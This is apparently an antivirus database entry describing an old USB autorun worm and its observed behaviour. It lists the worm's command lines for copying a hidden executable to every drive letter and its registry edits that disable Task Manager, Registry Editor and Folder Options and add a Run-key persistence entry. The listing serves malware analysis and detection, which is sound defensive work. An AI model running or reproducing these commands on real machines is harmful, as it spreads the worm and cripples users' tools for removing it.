Win32.HLLW.Autoruner1.13425
Added to the Dr.Web virus database: 2012-03-14
Virus description added: 2012-04-02
Technical Information
To ensure autorun and distribution:
Creates the following files on removable media:
- <Drive name for removable media>:\AutoRun.inf
Malicious functions:
To complicate detection of its presence in the operating system,
forces the system to hide from view:
blocks execution of the following system utilities:
- Windows Task Manager (Taskmgr)
- Registry Editor (RegEdit)
Creates and executes the following:
- %TEMP%\1.tmp\b2e.exe %TEMP%\1.tmp\b2e.exe <Current directory> <Full path to virus>
Executes the following:
- <SYSTEM32>\attrib.exe +h +r q:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe q:\
- <SYSTEM32>\attrib.exe +h +r p:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe r:\
- <SYSTEM32>\attrib.exe +h +r s:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe s:\
- <SYSTEM32>\attrib.exe +h +r r:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe n:\
- <SYSTEM32>\attrib.exe +h +r m:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe m:\
- <SYSTEM32>\attrib.exe +h +r n:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe p:\
- <SYSTEM32>\attrib.exe +h +r o:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe o:\
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe t:\
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe y:\
- <SYSTEM32>\attrib.exe +h +r x:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe x:\
- <SYSTEM32>\attrib.exe +h +r y:\Bali.exe
- <SYSTEM32>\attrib.exe +h +r %a:\AutoRun.inf
- <SYSTEM32>\attrib.exe +h +r z:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe z:\
- <SYSTEM32>\attrib.exe +h +r u:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe u:\
- <SYSTEM32>\attrib.exe +h +r t:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe v:\
- <SYSTEM32>\attrib.exe +h +r w:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe w:\
- <SYSTEM32>\attrib.exe +h +r v:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe c:\
- <SYSTEM32>\taskkill.exe /im helpctr.exe
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /t reg_dword /v superHidden /d 00000001
- <SYSTEM32>\attrib.exe +h +r c:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe e:\
- <SYSTEM32>\attrib.exe +h +r <Drive name for removable media>:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe <Drive name for removable media>:\
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /t reg_dword /v DisableRegistryTools /d 00000001
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /f /t reg_sz /v RunBaLi /d %WINDIR%\addins\Bali.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\batfile.bat" "
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /t reg_dword /v DisableTaskMgr /d 00000001
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /t reg_dword /v Hidden /d 00000002
- <SYSTEM32>\reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /t reg_dword /v NoFolderOptions /d 00000001
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /t reg_dword /v NoFolderOptions /d 00000001
- <SYSTEM32>\attrib.exe +h +r e:\Bali.exe
- <SYSTEM32>\attrib.exe +h +r j:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe j:\
- <SYSTEM32>\attrib.exe +h +r i:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe k:\
- <SYSTEM32>\attrib.exe +h +r l:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe l:\
- <SYSTEM32>\attrib.exe +h +r k:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe g:\
- <SYSTEM32>\attrib.exe +h +r f:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe f:\
- <SYSTEM32>\attrib.exe +h +r g:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe i:\
- <SYSTEM32>\attrib.exe +h +r h:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe h:\
Modifies settings of Windows Explorer:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] 'NoFolderOptions' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
Modifies file system:
Creates the following files:
- C:\AutoRun.inf
- %TEMP%\2.tmp\batfile.bat
- %TEMP%\1.tmp\b2e.exe
Miscellaneous:
Searches for the following windows:
- ClassName: '' WindowName: ''